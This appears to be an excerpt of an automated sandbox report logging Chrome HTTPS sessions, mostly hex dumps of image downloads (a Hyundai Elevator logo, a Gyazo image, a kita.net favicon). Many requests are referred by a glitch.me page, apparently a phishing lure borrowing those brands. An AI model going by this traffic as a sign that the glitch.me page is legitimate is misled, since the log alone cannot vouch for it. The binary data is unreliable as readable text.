                                                          Data Ascii: ]Ku2;[guh<2+ !8 WBCs/x~kNdXg@l#qX-OxO]t4q;gU2</x^:]]2)bmt+:(GFh4xZ}O6Znwd"h S:75Gyd1=Jy


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.44975913.227.8.64443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:06 UTC600OUTGET /hyundaielevator.com HTTP/1.1
                                                          Host: logo.clearbit.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Accept: */*
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Origin: https://troubled-worried-bamboo.glitch.me
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:07 UTC548INHTTP/1.1 200 OK
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          Cache-Control: public, max-age=2592000
                                                          Date: Tue, 03 Dec 2024 02:27:06 GMT
                                                          x-envoy-response-flags: -
                                                          Server: Clearbit
                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                          x-content-type-options: nosniff
                                                          X-Cache: Miss from cloudfront
                                                          Via: 1.1 bd15b9fe20805eb37db52439d6b42ff4.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: BAH53-C1
                                                          X-Amz-Cf-Id: frpHXKlYPFTFCvsu9wWV-IDk_YhpdWK0Dy4Ygcxxd3EbDhiDfCYuCA==
                                                          2024-12-03 02:27:07 UTC8892INData Raw: 32 32 62 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 22 7b 49 44 41 54 78 9c ec bd db 93 5d c7 75 1f bc d6 ea ee bd cf 39 73 e1 90 20 24 d3 b7 af f4 59 aa 44 8e e3 38 4e a5 52 79 48 2a 95 54 e5 21 e5 3c a5 fc 2f e4 29 79 4a a5 fc e0 54 52 71 95 23 3b e5 2a 4b 56 d9 b2 22 3b b4 28 8b a2 2c 5e 4c 89 14 2f 22 00 de 00 82 b8 10 77 60 70 07 06 00 01 0c 66 30 33 67 ce 65 ef ee 5e 6b a5 ba f7 19 40 14 69 82 d0 00 3c 43 6a 16 0e 80 a9 99 33 fb ec dd bf ee 75 eb df 5a 6d 55 15 36 65 7c 42 e3 be 81 9f 75 d9 04 60 cc b2 09 c0 98 65 13 80 31 cb 26 00 63 96 4d 00 c6 2c 9b 00 8c 59 36 01 18 b3 6c 02 30 66 d9 b8 00 d4 50 8b 0a 30 00 74 53 b0 ae 00 11 60 00 00 bd 61 fe 32 7d 4b 75 08 0c ca a0 12 ab 6a
                                                          Data Ascii: 22b4PNGIHDRL\"{IDATx]u9s $YD8NRyH*T!</)yJTRq#;*KV";(,^L/"w`pf03ge^k@i<Cj3uZmU6e|Bu`e1&cM,Y6l0fP0tS`a2}Kuj
                                                          2024-12-03 02:27:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449762104.18.25.163443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:07 UTC396OUTGET /56ce8c9ac0a9aac3fa5ba75a1e3ce1ae.jpg HTTP/1.1
                                                          Host: i.gyazo.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: Gyazo_cfwoker=i
                                                          2024-12-03 02:27:08 UTC590INHTTP/1.1 200 OK
                                                          Date: Tue, 03 Dec 2024 02:27:08 GMT
                                                          Content-Type: image/jpeg
                                                          Content-Length: 229314
                                                          Connection: close
                                                          CF-Ray: 8ec01da70c0e43b2-EWR
                                                          CF-Cache-Status: HIT
                                                          Accept-Ranges: bytes
                                                          Access-Control-Allow-Origin: https://gyazo.com
                                                          Age: 340615
                                                          Cache-Control: public, max-age=31536000
                                                          ETag: "56ce"
                                                          Expires: Wed, 03 Dec 2025 02:27:08 GMT
                                                          Set-Cookie: Gyazo_cfwoker=i; Secure; HttpOnly; SameSite=None; Expires=Tue, 01 Jan 2030 00:00:00 GMT
                                                          Vary: Accept-Encoding
                                                          Via: 1.1 google
                                                          access-control-allow-credentials: true
                                                          Cf-Bgj: h2pri
                                                          x-cache-level: ZS
                                                          Server: cloudflare
                                                          2024-12-03 02:27:08 UTC779INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 03 85 07 6f 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                          Data Ascii: JFIFCCo"}!1AQa"q2
                                                          2024-12-03 02:27:08 UTC1369INData Raw: 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00 4a 29 68 a0 04 a2 96 8a 00
                                                          Data Ascii: J)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)hJ)h
                                                          2024-12-03 02:27:08 UTC1369INData Raw: b4 3c 70 41 c1 6f c6 80 3d ba 8a f3 df 02 7c 62 b3 f1 5c fa ce 9d ac 69 37 be 0d f1 06 8b 12 cf a8 e9 7a c3 c5 98 a0 6d db 67 49 63 76 8e 48 9b 63 fc ca dc 6d 21 82 91 8a e6 ec fe 3a 78 a3 c6 30 9d 47 c0 bf 0c b5 0f 10 78 74 93 e4 6a fa 96 a5 06 98 97 aa 0f df b7 8d f7 3b 21 fe 16 71 18 6e 08 e0 e6 80 3d 9a 8a e1 3e 1d 7c 5c b0 f8 80 da 95 8b e9 ba 87 87 7c 49 a5 15 1a 8e 83 ab 22 a5 cd be ec ec 70 51 99 24 8d f0 76 c9 1b 32 9c 11 90 41 03 82 f0 57 c7 af 88 5e 3d f0 fc 1a fe 93 f0 91 2e b4 59 da 51 14 89 e2 68 16 79 02 3b 27 11 bc 4a 01 25 4f 05 87 d6 80 3d e2 8a f2 0b 4f 8d de 20 f1 66 98 65 f0 77 80 a6 d4 b5 5b 1b 97 b2 d6 b4 7d 6b 54 8b 4e b9 d2 e7 0a 8c a8 f8 59 56 4d ca e1 83 23 15 23 04 13 9e 31 7c 2b f1 d3 e2 5f 8c 2e 35 78 ec 7e 11 da 63 49 d4 64
                                                          Data Ascii: <pAo=|b\i7zmgIcvHcm!:x0Gxtj;!qn=>|\|I"pQ$v2AW^=.YQhy;'J%O=O few[}kTNYVM##1|+_.5x~cId
                                                          2024-12-03 02:27:08 UTC1369INData Raw: df 17 34 36 d4 f4 1b 96 91 23 6d 93 41 28 db 2c 4d e8 cb d4 50 07 69 45 26 ea 5a 00 28 ae 47 c7 df 10 25 f0 2c 36 72 45 e1 4f 10 f8 9f ed 0c ca 57 40 b5 8e 63 0e 31 cb ef 91 30 0e 78 c6 7a 1a a7 f0 b7 e2 e6 9f f1 5a d7 59 92 cf 4a d5 b4 5b 8d 1e f8 e9 d7 96 5a cc 09 0c f1 cc 23 49 08 2a ae c3 1b 64 5e fe b4 01 dd 51 4d 2f 58 70 f8 8a fa 5f 19 dd 68 cd a0 5e 45 a7 43 65 1d ca 6b 6d 24 5f 67 96 46 76 53 02 ae ed fb d4 28 62 4a 81 86 1c d0 06 f5 14 dd fd 78 a4 59 37 74 14 00 fa 2b cb 7c 55 f1 f2 d3 c3 7e 36 d4 3c 2d 69 e0 ef 16 78 9b 51 d3 e0 82 e2 ea 4d 0e c6 29 a2 89 66 dd e5 82 5a 55 39 3b 1b b7 6a dc f0 0f c4 c9 bc 75 75 77 0c be 0d f1 3f 86 05 ba 2b 89 75 fb 38 e0 59 72 48 da 9b 24 7c 91 ef 8a 00 ed a8 a6 87 cf ff 00 ae 82 fb 7a d0 03 a8 a6 ef f6 c1 a3
                                                          Data Ascii: 46#mA(,MPiE&Z(G%,6rEOW@c10xzZYJ[Z#I*d^QM/Xp_h^ECekm$_gFvS(bJxY7t+|U~6<-ixQM)fZU9;juuw?+u8YrH$|z
                                                          2024-12-03 02:27:08 UTC1369INData Raw: df 20 fd fc a7 21 63 e0 b6 33 eb 3a f7 c0 98 2f 3c 41 7f ac f8 73 c6 1e 26 f0 25 d6 a4 fe 6e a1 1e 81 3d bb 41 77 21 18 32 b4 37 30 4c 89 21 00 02 f1 aa 93 81 92 48 06 a4 d5 3e 03 e9 57 da 0e 8b 67 6f af 78 8b 4e d5 b4 6b 89 6e ac bc 45 1e a1 e7 ea 31 cb 28 61 29 2d 3a c8 8e ae 18 e6 36 42 9d 30 a3 03 00 1e 59 e0 1d 22 d7 e1 e7 ed 0d e1 dd 2f c3 7f 0f ee fe 1a 68 7a f6 8d 7c 6f 74 95 7b 34 b2 b9 9a 06 80 c5 2a c3 6d 3c 88 b2 28 77 52 db 57 70 7e 49 c0 c4 1f 02 be 03 f8 37 e2 1f 87 fc 57 a9 78 cf 46 b6 f1 78 93 c5 5a d4 76 96 7a cc 62 e2 da c6 31 7d 28 22 18 9b 2a 8c cc 19 8b 81 bf e6 03 38 00 0f 57 d0 7e 02 e9 fa 5f 8e b4 8f 19 ea 3e 24 d7 fc 4b e2 8d 36 d6 e2 c9 35 0d 5a 68 3e 78 66 28 59 7c a8 62 8e 34 c1 8d 71 b1 17 3f c5 b8 e0 8e a7 c0 7e 01 d3 fe 1e
                                                          Data Ascii: !c3:/<As&%n=Aw!270L!H>WgoxNknE1(a)-:6B0Y"/hz|ot{4*m<(wRWp~I7WxFxZvzb1}("*8W~_>$K65Zh>xf(Y|b4q?~
                                                          2024-12-03 02:27:08 UTC1369INData Raw: 2d 8f a0 74 cf fb c3 d6 a4 9b f6 74 1a ca ad 9f 89 be 22 f8 d3 c5 ba 00 60 5b 43 d4 ae 2d 23 b6 98 03 90 92 bd bd b4 53 4a b9 c6 55 e4 21 80 c3 02 2b aa f8 87 f0 93 46 f8 8d 1e 9b 2d cd c6 a1 a3 6a fa 5b 33 e9 da ce 8d 71 f6 7b cb 32 c0 06 08 d8 2a 55 80 c1 47 56 53 81 91 c0 a0 0e 4f f6 9b 22 6f 07 f8 66 d5 7e 6b 9b 9f 16 68 89 0c 59 f9 a4 2b 7d 1b b0 03 be 15 19 8f b0 26 b8 8f 12 78 ea ff 00 c1 3f b5 b7 88 66 b0 f0 57 88 bc 66 d7 1e 12 b0 56 8b c3 cb 68 5e 00 2e ae 0e e7 fb 45 c4 23 07 b6 d2 4e 41 e2 bd 2b c2 ff 00 01 ed 34 9f 13 59 78 8b c4 1e 2a f1 1f 8f 35 8d 3f 77 f6 7c de 22 9e 0f 2a c8 b0 da 5e 28 2d e1 86 21 21 52 57 cc 28 5b 04 80 40 24 57 4d 67 f0 ef 4e b2 f8 91 a8 f8 d6 39 ae 8e ab 7d a6 c3 a5 cb 0b 32 f9 02 28 a4 77 52 06 dd db b3 23 67 2c 46
                                                          Data Ascii: -tt"`[C-#SJU!+F-j[3q{2*UGVSO"of~khY+}&x?fWfVh^.E#NA+4Yx*5?w|"*^(-!!RW([@$WMgN9}2(wR#g,F
                                                          2024-12-03 02:27:08 UTC1369INData Raw: 12 31 6d 6d aa 5b dc 3f 96 eb 2c 09 84 67 40 7c d1 26 37 0f 2c 8c e0 91 51 fc 2b f8 53 e1 2f 8e 5e 1e bb f1 97 c4 1d 0e c7 c6 3a e5 f6 a3 7b 1a ae b1 10 b8 4d 2e 38 ae 64 89 2d ed d1 f2 21 2a 23 19 2a 15 8b 16 27 93 c7 7f e1 bf 81 36 9a 5f 89 ac 7c 41 af f8 a7 c4 5e 3a d5 74 e0 df d9 d2 78 8a 6b 73 1d 89 65 da cf 14 36 f0 c3 1f 98 46 47 98 ca ce 01 20 30 c9 cb 35 8f 80 f6 f3 6b 57 fa 97 87 7c 63 e2 6f 03 9d 4a 53 3e a1 6b a0 4d 6d f6 7b a9 08 c3 48 63 b8 82 61 1b 9c 0c b4 5b 09 23 24 e7 9a 00 f1 5d 62 e2 7d 2f 4f d4 3c 20 6f 27 d4 34 5f 0c 7c 46 d0 ed 74 eb 8b c9 5a 69 22 82 46 82 6f 21 a4 62 4b f9 6d 23 28 dc 49 da 54 1c f7 f5 af da a2 44 4f 83 f7 3b d9 50 36 ad a4 a8 dd dd 8e a1 6f 81 f5 ad f6 f8 15 e1 19 3e 1c dd f8 26 4b 29 e4 d1 ae dc cf 3c ad 75 21
                                                          Data Ascii: 1mm[?,g@|&7,Q+S/^:{M.8d-!*#*'6_|A^:txkse6FG 05kW|coJS>kMm{Hca[#$]b}/O< o'4_|FtZi"Fo!bKm#(ITDO;P6o>&K)<u!
                                                          2024-12-03 02:27:08 UTC1369INData Raw: 40 8c c9 b5 42 8c a6 79 ac fd 73 e2 07 8b 23 f8 1b f1 5e d3 49 be f1 62 a6 8f 1d b4 9e 1d f1 17 89 74 9b dd 2e f7 12 ba 83 0b b4 d1 c2 f2 98 d8 11 e6 01 96 47 50 49 39 27 d9 fc 41 f0 97 c4 16 3e 2a d4 7c 45 e0 0f 16 5b f8 5a f3 56 64 93 54 d3 f5 4d 2b fb 4a c2 ea 55 40 8b 38 8d 66 85 d2 5d aa aa 59 64 c3 05 5c a9 23 35 26 b7 f0 8f 5a f1 67 c2 ed 6f c2 fe 21 f1 94 9a b6 a7 ab 3a c8 fa 99 d3 a3 8a 1b 7c 32 30 48 60 56 c8 4f 93 a3 48 cd 96 27 77 6a 00 f3 cf 8c 1f 0d f5 af 87 7f 0a b5 ff 00 1f e9 3e 3c f1 44 be 3b d0 f4 f9 35 4f b4 5e eb 13 be 9b 76 f1 ae f6 86 4b 0d df 67 11 30 05 70 88 ac a0 e4 36 46 6a 5f 16 7c 2c d6 74 bf 85 97 fe 3a 8f c7 fe 29 1e 3d b2 d3 1b 56 17 8b ab ce 34 d6 95 23 32 f9 27 4f dd f6 7f 20 e3 6e 36 6e c7 3b f7 7c d5 ec 9f 12 fc 11 ff
                                                          Data Ascii: @Bys#^Ibt.GPI9'A>*|E[ZVdTM+JU@8f]Yd\#5&Zgo!:|20H`VOH'wj><D;5O^vKg0p6Fj_|,t:)=V4#2'O n6n;|
                                                          2024-12-03 02:27:08 UTC1369INData Raw: 5c bd a7 c3 98 fc 5b 1a dd 78 cf e3 6c 93 dd 38 df e4 e9 d7 71 a4 69 ec 03 03 fc eb 37 c4 d2 6b bf 05 74 bb 9d 77 c2 3f 16 60 f1 05 8d 92 f9 8d a3 6a 57 0b 21 91 57 a8 1b 76 f3 ed 40 1e 81 e1 ff 00 88 de 3f 97 e3 3e af 03 78 6e 46 4f 21 41 b6 69 5b 64 63 e5 f9 80 cf f9 cd 7d 2e ac 59 41 23 07 19 c5 70 df 09 b5 cb 1f 1f 78 57 4c f1 82 58 25 ae a1 a9 5b 8f 39 ff 00 88 91 80 47 5e 99 15 dd 50 03 38 cf 5c 57 ca d6 7e 2d d5 fc 1b 0f c6 56 d0 dd 2d b5 8d 5b e2 15 ae 8f 67 79 32 07 4b 56 b8 86 ce 2f 38 ab 70 db 37 16 03 a1 20 03 c6 6b db fc 75 e0 ef 19 ea 5a cc 1a af 83 fc 6d 0f 87 a5 10 79 13 e9 fa b6 95 fd a5 63 28 0c 48 90 46 b3 42 e9 20 c9 1b 84 98 23 00 a9 c0 ac ad 27 e0 0e 9a 3e 1c eb 3e 19 d7 b5 3b ad 72 f7 5b bd 7d 53 51 d6 55 16 da 66 bd 2e ae b3 c4 ab
                                                          Data Ascii: \[xl8qi7ktw?`jW!Wv@?>xnFO!Ai[dc}.YA#pxWLX%[9G^P8\W~-V-[gy2KV/8p7 kuZmyc(HFB #'>>;r[}SQUf.
                                                          2024-12-03 02:27:08 UTC1369INData Raw: 5d b2 b1 97 4b b8 d2 75 cf 32 3b 5b cb 67 75 93 02 68 c3 3c 32 2b 20 21 b6 38 20 90 57 80 42 f8 43 e3 16 ad 73 e3 0b 2f 09 78 df c1 b7 7e 0e d7 ef a2 92 6b 19 a1 bc 8e ff 00 4e be 11 00 64 58 67 40 ac 18 0f 9b 6c 91 a1 23 91 9e 71 b9 e3 9f 05 f8 ab 58 d5 2d b5 4f 0a 78 de 4f 0d 5d c3 11 85 ec af 74 f4 d4 34 f9 d7 71 3b 9e 1d d1 c8 1c 67 01 92 55 e3 82 0e 06 32 3c 2f f0 a7 c4 12 78 c6 c3 c5 5e 3a f1 5d bf 89 b5 5d 32 29 62 d3 6d 74 bd 2b fb 3a ca d0 c8 02 c9 28 8d a5 9a 47 90 a8 0b b9 a4 c0 04 e1 46 68 03 cc 34 1f 14 78 9f 5a f8 7d f0 db c2 90 f8 8e fb 4f bf f1 36 ad a9 5a de f8 83 cd f3 6e e3 b6 b6 92 77 64 89 e4 dd 89 18 22 a2 b1 07 68 c9 03 20 53 fe 3a fc 37 d4 be 14 fc 35 bb d6 fc 19 e3 af 15 e9 d3 47 79 64 97 b0 ea da fd e6 a2 b7 31 3d d4 4a c1 1a 79
                                                          Data Ascii: ]Ku2;[guh<2+ !8 WBCs/x~kNdXg@l#qX-OxO]t4q;gU2</x^:]]2)bmt+:(GFh4xZ}O6Znwd"h S:75Gyd1=Jy


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.44976313.227.8.72443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:09 UTC360OUTGET /hyundaielevator.com HTTP/1.1
                                                          Host: logo.clearbit.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:09 UTC555INHTTP/1.1 200 OK
                                                          Content-Type: image/png
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          access-control-allow-origin: *
                                                          Cache-Control: public, max-age=2592000
                                                          Date: Tue, 03 Dec 2024 02:27:06 GMT
                                                          x-envoy-response-flags: -
                                                          Server: Clearbit
                                                          strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                          x-content-type-options: nosniff
                                                          X-Cache: Hit from cloudfront
                                                          Via: 1.1 a465b0f40ab8b9ef8cd03abba841c4b2.cloudfront.net (CloudFront)
                                                          X-Amz-Cf-Pop: BAH53-C1
                                                          X-Amz-Cf-Id: zpbgH-naPppC2TcVXVg7pEUSsMCcGbSrShKjgEpiQf1mRs3ggZOeLg==
                                                          Age: 3
                                                          2024-12-03 02:27:09 UTC8892INData Raw: 32 32 62 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 22 7b 49 44 41 54 78 9c ec bd db 93 5d c7 75 1f bc d6 ea ee bd cf 39 73 e1 90 20 24 d3 b7 af f4 59 aa 44 8e e3 38 4e a5 52 79 48 2a 95 54 e5 21 e5 3c a5 fc 2f e4 29 79 4a a5 fc e0 54 52 71 95 23 3b e5 2a 4b 56 d9 b2 22 3b b4 28 8b a2 2c 5e 4c 89 14 2f 22 00 de 00 82 b8 10 77 60 70 07 06 00 01 0c 66 30 33 67 ce 65 ef ee 5e 6b a5 ba f7 19 40 14 69 82 d0 00 3c 43 6a 16 0e 80 a9 99 33 fb ec dd bf ee 75 eb df 5a 6d 55 15 36 65 7c 42 e3 be 81 9f 75 d9 04 60 cc b2 09 c0 98 65 13 80 31 cb 26 00 63 96 4d 00 c6 2c 9b 00 8c 59 36 01 18 b3 6c 02 30 66 d9 b8 00 d4 50 8b 0a 30 00 74 53 b0 ae 00 11 60 00 00 bd 61 fe 32 7d 4b 75 08 0c ca a0 12 ab 6a
                                                          Data Ascii: 22b4PNGIHDRL\"{IDATx]u9s $YD8NRyH*T!</)yJTRq#;*KV";(,^L/"w`pf03ge^k@i<Cj3uZmU6e|Bu`e1&cM,Y6l0fP0tS`a2}Kuj
                                                          2024-12-03 02:27:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449764203.233.202.180443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:12 UTC601OUTGET /imgs/favicon.png HTTP/1.1
                                                          Host: kita.net
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://troubled-worried-bamboo.glitch.me/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:12 UTC386INHTTP/1.1 200
                                                          Date: Tue, 03 Dec 2024 02:27:12 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 3732
                                                          Connection: close
                                                          Set-Cookie: INGRESSCOOKIE=1733192833.55.2031.82594|24b3bc9daff3ed42ff412645d37535d9; Path=/; Secure; HttpOnly
                                                          Accept-Ranges: bytes
                                                          ETag: W/"3732-1733097628000"
                                                          Last-Modified: Mon, 02 Dec 2024 00:00:28 GMT
                                                          Strict-Transport-Security: max-age=0; includeSubDomains
                                                          2024-12-03 02:27:12 UTC3710INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 52 00 00 00 52 08 06 00 00 00 c7 2c 83 9b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                          Data Ascii: PNGIHDRRR,tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4
                                                          2024-12-03 02:27:12 UTC22INData Raw: 03 00 96 de 04 0d f3 84 52 ee 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: RIENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449765203.233.202.180443732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-03 02:27:14 UTC348OUTGET /imgs/favicon.png HTTP/1.1
                                                          Host: kita.net
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-12-03 02:27:15 UTC388INHTTP/1.1 200
                                                          Date: Tue, 03 Dec 2024 02:27:15 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 3732
                                                          Connection: close
                                                          Set-Cookie: INGRESSCOOKIE=1733192836.142.2857.715214|24b3bc9daff3ed42ff412645d37535d9; Path=/; Secure; HttpOnly
                                                          Accept-Ranges: bytes
                                                          ETag: W/"3732-1733097628000"
                                                          Last-Modified: Mon, 02 Dec 2024 00:00:28 GMT
                                                          Strict-Transport-Security: max-age=0; includeSubDomains
                                                          2024-12-03 02:27:15 UTC3708INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 52 00 00 00 52 08 06 00 00 00 c7 2c 83 9b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                          Data Ascii: PNGIHDRRR,tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4
                                                          2024-12-03 02:27:15 UTC24INData Raw: 9f 00 03 00 96 de 04 0d f3 84 52 ee 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: RIENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.44976634.117.59.81443732C:\Program Files\Google\Chrome\Application\chrome.exe
